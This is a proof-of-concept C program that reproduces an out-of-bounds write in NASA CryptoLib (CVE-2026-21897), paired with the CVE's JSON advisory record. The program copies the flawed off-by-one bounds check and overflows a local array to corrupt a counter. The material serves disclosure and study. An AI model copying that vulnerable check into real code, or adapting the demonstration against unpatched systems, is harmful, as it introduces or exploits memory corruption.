CVE-2026-21897

/* CVE-2026-21897 PoC - CryptoLib Array Out-of-Bounds Write * This PoC demonstrates triggering the buffer overflow by adding * more than 250 GVCID entries to overwrite gvcid_counter */ #include <stdio.h> #include <stdint.h> #define GVCID_MAN_PARAM_SIZE 250 #define MAX_ENTRIES 260 typedef struct { uint16_t vcid; uint16_t tfvn; uint16_t scid; } GvcidManagedParam; typedef struct { GvcidManagedParam params[GVCID_MAN_PARAM_SIZE]; uint32_t gvcid_counter; // Located right after the array } GvcidManager; /* Vulnerable function - only checks counter > GVCID_MAN_PARAM_SIZE */ int Crypto_Config_Add_Gvcid_Managed_Parameters(GvcidManager* mgr, uint16_t tfvn, uint16_t scid, uint16_t vcid) { if (mgr->gvcid_counter > GVCID_MAN_PARAM_SIZE) { /* Should reject but only checks this condition */ return -1; } /* BUG: No bounds check on array index, allows gvcid_counter up to 251 */ mgr->params[mgr->gvcid_counter].tfvn = tfvn; mgr->params[mgr->gvcid_counter].scid = scid; mgr->params[mgr->gvcid_counter].vcid = vcid; mgr->gvcid_counter++; return 0; } int main() { GvcidManager mgr = {0}; int result; printf("CVE-2026-21897 PoC - CryptoLib OOB Write\n"); printf("Initial gvcid_counter: %u\n", mgr.gvcid_counter); /* Add 251 entries to trigger overflow */ for (int i = 0; i < MAX_ENTRIES; i++) { result = Crypto_Config_Add_Gvcid_Managed_Parameters(&mgr, 0, 0, i); printf("Entry %d: result=%d, counter=%u\n", i+1, result, mgr.gvcid_counter); /* After 250 entries, counter overflows array bounds */ if (i >= GVCID_MAN_PARAM_SIZE) { printf("[VULN] Out-of-bounds write at entry %d!\n", i+1); } } printf("\nFinal gvcid_counter value: %u (corrupted)\n", mgr.gvcid_counter); printf("Expected counter: %d, Actual: %u\n", MAX_ENTRIES, mgr.gvcid_counter); return 0; }

{"cve": {"id": "CVE-2026-21897", "sourceIdentifier": "[email protected]", "published": "2026-01-10T01:16:17.053", "lastModified": "2026-01-15T21:48:26.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_Config_Add_Gvcid_Managed_Parameters function only checks whether gvcid_counter > GVCID_MAN_PARAM_SIZE. As a result, it allows up to the 251st entry, which causes a write past the end of the array, overwriting gvcid_counter located immediately after gvcid_managed_parameters_array[250]. This leads to an out-of-bounds write, and the overwritten gvcid_counter may become an arbitrary value, potentially affecting the parameter lookup/registration logic that relies on it. This issue has been patched in version 1.4.3."}, {"lang": "es", "value": "CryptoLib proporciona una solución únicamente de software utilizando el Protocolo de Seguridad de Enlace de Datos Espaciales CCSDS - Procedimientos Extendidos (SDLS-EP) para asegurar las comunicaciones entre una nave espacial ejecutando el Sistema de Vuelo central (cFS) y una estación terrestre. Antes de la versión 1.4.3, la función Crypto_Config_Add_Gvcid_Managed_Parameters solo verifica si gvcid_counter &gt; GVCID_MAN_PARAM_SIZE. Como resultado, permite hasta la entrada 251, lo que provoca una escritura más allá del final del array, sobrescribiendo gvcid_counter ubicado inmediatamente después de gvcid_managed_parameters_array[250]. Esto conduce a una escritura fuera de límites, y el gvcid_counter sobrescrito puede convertirse en un valor arbitrario, afectando potencialmente la lógica de búsqueda/registro de parámetros que depende de él. Este problema ha sido parcheado en la versión 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "AE1BE91E-2901-42AF-BC66-762CFA7A2582"}]}]}], "references": [{"url": "https://github.com/nasa/CryptoLib/releases/tag/v1.4.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-9x7j-gx23-7m5r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}